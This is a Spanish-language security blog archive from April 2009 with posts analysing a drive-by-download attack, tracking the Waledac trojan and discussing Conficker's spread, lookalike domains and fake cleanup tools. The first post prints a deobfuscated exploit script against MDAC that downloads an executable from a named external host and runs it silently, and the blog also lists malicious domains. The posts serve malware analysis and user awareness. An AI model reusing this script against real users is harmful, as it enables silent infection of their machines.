Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

jueves, 9 de abril de 2009

Drive-by-Download y Drive-by-Update como parte del proceso de infección

Sin lugar a dudas, los delincuentes informáticos han encontrado en Internet una excelente plataforma de ataque de la cual aprovechan, no sólo las capacidades de diseminación de malware de manera casi instantánea a través de diferentes tecnologías, sino que también hacen abuso de las debilidades que presenta el factor humano; la mayoría de los casos, por falta de un adecuado nivel (mínimo) de educación en materia de seguridad en general y sobre códigos maliciosos en particular.

Diferentes técnicas de ataque posibilitan, si se cumplen determinadas condiciones en el equipo víctima, que las instrucciones cada vez más invasivas del malware, infecten los sistemas con la sola acción de establecer una conexión con Internet.

El siguiente ejemplo, representa uno de los ataques más comunes a través de Internet, Drive-by-Download.

En el preciso momento en que el usuario accede a la dirección web, en segundo plano se ejecutan instrucciones maliciosas a través de un script ofuscado que, desofuscado, muestra lo siguiente:
var ailian, zhan, cmdss;
ailian = "http://pxciiruurw .cn/new/load .exe";
zhan = "run.exe";
try {
var ado = (document.createElement("object"));
var d = 1;
ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var e = 1;
var xml = ado.CreateObject("Microsoft.XMLHTTP", "");
var f = 1;
var ln = "Ado";
var lzn = "db.St";
var an = "ream";
var g = 1;
var as = ado.createobject(ln + lzn + an, "");
var h = 1;
xml.Open("GET", ailian, 0);
xml.Send();
as.type = 1;
var n = 1;
as.open();
as.write(xml.responseBody);
as.savetofile(zhan, 2);
as.close();
var shell = ado.createobject("Shell.Application", "");
shell.ShellExecute(zhan, "", "", "open", 0);
}
catch (e){
}
;
Esto significa que el script contiene un exploit, en este caso, que explota una vulnerabilidad en MDAC (Microsoft Data Access Components), y descarga un binario llamado load.exe (MD5: f2e4869924c6468fbc05a146a1a3bd11).

Se trata de un troyano tipo download que intenta establecer conexión con http://ddvrrflabpqcuoaexpwp.cn/2_s_t .php para descargar más malware.

En muchos otros casos, el Drive-by-Download es combinada con otras como el Drive-by-Update para continuar el proceso de propagación post infección, permitiendo el acceso al sistema de otros códigos maliciosos.

El Drive-by-Update es un proceso malicioso post infección utilizado para controlar las descargas de códigos maliciosos.

En el caso de la vulnerabilidad en MDAC explotada por este malware, la misma data del año 2006. Aún así, a pesar de tener solución a través de un parche de seguridad, es altamente explotada como vector ataque a través de Internet.

Por lo tanto, esto supone un mayor grado de cuidado sobre las páginas que visitamos, y un mejor empleo de las buenas prácticas de seguridad que ayudarán notablemente a la prevención ante potenciales infecciones.

Información relacionada
Explotación masiva de vulnerabilidades a través de servidores fantasmas
Análisis esquemático de un ataque de malware basado en web
Ataque de malware vía Drive-by-Download
Análisis de un ataque de malware basado en web
Drive-by Update para propagación de malware

# pistus

Ver más

Publicado por Jorge Mieres 0 comentarios

martes, 7 de abril de 2009

Waledac. Seguimiento detallado de una amenaza latente

Las noticias controversiales de los últimos días en torno al gusano Conficker, han "tapado" bastante las acciones dañinas de otras amenazas que, por su menor cobertura mediática, no han tenido una significativa publicidad ni demanda por parte de los medios de información, o desinformación en algunos casos. Sin embargo, aún así, siguen aumentando su cobertura de infección. Uno de estos casos es Waledac.

Este troyano, cuya campaña de infección comenzó a gestarse a través de un amplio repertorio de amorosas imágenes y, últimamente falsas noticias sobre explosiones, utilizadas como estrategias de Ingeniería Social, sigue teniendo un alto índice de infección a nivel global. En este sentido, muchos esperamos que en cualquier momento, al estilo Nuwar, modifique nuevamente la estrategia de engaño visual.

Sudosecure viene realizando un excelente trabajo rastreando los pasos de Waledac desde su aparición ofreciendo informes actualizados con datos detallados sobre el estado actual del troyano. De este seguimiento podemos desprender información como por ejemplo, el top 10 de los binarios más descargados y las 10 direcciones IP más utilizadas para descargarlos.

Los 10 países que más propagan Waledac y los 10 dominios más utilizados.

Incluso, el número de direcciones IP propagando el troyano en los últimos 30 días.

Claramente se percibe el grado de propagación a nivel global. Y cada vez que veo cosas por el estilo, me pregunto cuál es el nivel de propagación, en este caso, de Waledac a nivel local (Argentina). Esta información también puede ser desprendida de las estadísticas que se encuentran en sudosecure.

Para clarificar un poco la incógnita, he realizado un sencillo gráfico que muestra la relación de dominios, direcciones IP y ubicación desde la cuál se produce la diseminación de Waledac.

Es decir, cada una de las direcciones IP representa un equipo infectado. El gráfico está realizado en base a los primeros 50 dominios que propagan Waledac desde la Argentina.

En algunos casos notarán que una misma dirección IP es utilizada por varios dominios y viceversa, esto es porque Waledac utiliza mecanismos complejos de propagación como lo son las redes Fast-Flux.

Quizás muchos de nosotros nos olvidemos que Waledac transforma los equipos de usuarios desprevenido en zombis para alimentar, aún más, la importante botnet desde la cual, entre otras cosas, distribuye spam de manera distribuida.

Información relacionada
Más Waledac en acción ¿Puedes adivinar cuánto te amo gano?
Waledac más amoroso que nunca
Waledac e Ingeniería Social en San Valentín

# pistus

Ver más

Publicado por Jorge Mieres 0 comentarios

sábado, 4 de abril de 2009

Conficker IV. Dominios relacionados... y controversiales

Luego de publicar Conficker III. Campaña de propagación de falsas herramientas de limpieza, tanto en este mismo blog como en el blog de evilfingers, he recibido algunos correos preguntando por qué había publicado nombres de dominios que no guardan relación alguna con lo que se expresa en el post en cuestión; es decir, con falsas herramientas de limpieza.

Sin embargo, y teniendo en cuenta esta situación, resulta necesario aclarar cómo se ha tejido una gran estrategia propagandista para "aprovechar", de manera positiva en algunos casos y negativa en otros, la gran demanda que atrajo la palabra "conficker" como consecuencia de la gran oleada de supersticiones que rondan en torno al gusano.

¿Qué quiero decir con esto?, la situación hizo que la palabra sea utilizada como campaña para atraer más visitas y más publicidad.

La cuestión es que la campaña tuvo dos vertientes bien diferenciadas. Una dada por quienes se encuentran bajo la bandera de la seguridad, donde, con la intención de generar un efecto "imán" al utilizar la palabra "conficker", algunas compañías han adquirido los dominios que en un primer momento habían sido utilizados con fines maliciosos, para redireccionar hacia la descarga de una herramienta de limpieza legítima o información relacionada para combatir la amenaza que supone el gusano.

Por ejemplo, http://www.remove-conficker.org redirecciona a http://www.microsoft.com/protect/computer/viruses/worms/conficker.mspx, o también http://downadup.org que ahora redirecciona a http://www.bdtools.net.

Por otro lado, quienes se encuentran constantemente pensando estrategias de engaño que permitan aumentar sus ganancias a través de diferentes acciones poco éticas, también vieron en la palabra "conficker" una oportunidad.

En consecuencia, comenzaron a aparecer muchos sitios web que, bajo la promesa de ofrecer información sobre la limpieza de conficker o herramientas gratuitas, utilizan la oportunidad para ganar visitas.

La palabra "conficker" es una de las más buscadas en Internet, gracias a la campaña de propaganda global que los medios de información se encargaron de alimentar, por lo tanto, no resulta para nada extraño encontrarse con acciones de este tipo.

Información relacionada
Conficker III. Campaña de propagación de falsas herramientas de limpieza
Conficker II. Infección distribuida del gusano mediático
Conficker. Cuando lo mediático se hace eco de todos descuidando el problema de fondo

# pistus

Ver más

Publicado por Jorge Mieres 0 comentarios

viernes, 3 de abril de 2009

Conficker III. Campaña de propagación de falsas herramientas de limpieza

La gran repercusión que el gusano conficker tuvo a nivel mundial, hizo que no sólo los medios de comunicación se hagan eco de sus actividades, sino que también, estas mismas repercusiones son utilizadas de manera maliciosa para propagar otros tipos de códigos maliciosos.


Algunos sitios ya dieron cuenta de la existencia de páginas web que hacen referencia sobre supuestas herramientas de limpieza para conficker pero que en lugar de ello descargan algún componente malicioso. Es decir, la promesa de erradicar la amenaza del equipo que prometen muchos de estos sitios es falso. Es simplemente una estrategia de engaño para propagar programas tipo scareware o, en algunos casos, troyanos.

Algunos de los dominios de este estilo son:

http://conficker-cleaner .com
http://confickerc .net
http://conficker .com
http://confickerc .org
http://conficker.co .uk
http://confickercvirus .com
http://confickercvirus .info
http://confickercvirus .net
http://confickercvirus .org
http://conficker .de
http://conficker .info
http://conficker .net
http://conficker .org
http://downadup .com
http://downadup.co .uk
http://downadup .de
http://downadup .info
http://downadup .net
http://downadup .org
http://downadupvirus .com
http://downadupworm .com
http://removeconficker .net
http://removeconficker .org
http://stopconficker .com
http://w32downadupc .com

La mayoría de las compañías antivirus han desarrollado una herramienta de limpieza específica para ayudar a combatir al gusano conficker, y algunas otras organizaciones de seguridad también poseen alternativas que ayudan a detectar la amenaza.

Cada uno de estos sitios representa un potencial peligro de infección, por lo tanto hay que evitarlas y/o filtrarlas.

Información relacionada
Conficker II. Infección distribuida del gusano mediático
Conficker. Cuando lo mediático se hace eco de todos descuidando el problema de fondo

# pistus

Ver más

Publicado por Jorge Mieres 0 comentarios

jueves, 2 de abril de 2009

Conficker II. Infección distribuida del gusano mediático

Pasado el "tan esperado día" en que supuestamente conficker arrasaría con todo, son muchas las reflexiones que quedan pululando por la gran red. Muchas compañías de seguridad y profesionales de la materia que pronosticaban una gran ola maliciosa arrastrada por el gusano mediático, se quedaron sin respuestas al ver que terminaba el día y nada pasaba :-)

Es decir, conficker no "salió" al campo con nada nuevo, siguió su carrera de infección como lo viene haciendo desde un principio aumentando el índice de infección que se tenía hasta el momento; con lo cual no quedó otra que decir "eso no significa que en un futuro no muy lejano conficker salga al campo con un batallón más grande". Esto es lógico, cualquier malware puede manifestarse en cualquier momento vaya uno a saber con qué.

Si bien no se pone en tela de juicio que conficker es un peligroso código malicioso, lo sucedido hasta el momento demuestra la inteligencia de su creador (o sus creadores) en la planificación no sólo de la estrategia de diseminación sino que también en la estrategia de Propaganda, Ingeniería Social y Acción Psicológica que ejerció a través de los medios de comunicación de todo el mundo, tan solo con implantar un rumor.

Tampoco se cuestiona que ha logrado un altísimo índice de infección descubriendo, como lo he comentado en el anterior post, lo inmaduro que todavía se encuentran algunas cuestiones de seguridad, tanto a nivel hogareño como, más preocupante aún, a nivel corporativo.

En relación al nivel de infección de conficker, estaba leyendo un breve y muy interesante informe en Conficker Working Group llamado Infection Distribution, en el cual se muestra a través de mapas, los índices de infección del gusano a nivel global.

Infecciones a nivel mundial
Infecciones en Estados Unidos
Infecciones en Europa
Infecciones en Australia
Infecciones en Indonesia y Malasia
Según Conficker Working Group, cada uno de los mapas fueron generados a partir de todas las infecciones de conficker producidas desde el principio de su existencia, lo que suma aproximadamente un total de 35 millones de IP's.

Si bien los mapas no expresan un número exacto de infecciones, dejan una idea clara de la distribución de infecciones que logró hasta el momento conficker y las zonas más afectadas por el mismo.

Información relacionada
Conficker. Cuando lo mediático se hace eco de todos descuidando el problema de fondo

# pistus

Ver más

Publicado por Jorge Mieres 2 comentarios

Suscribirse a: Entradas (Atom)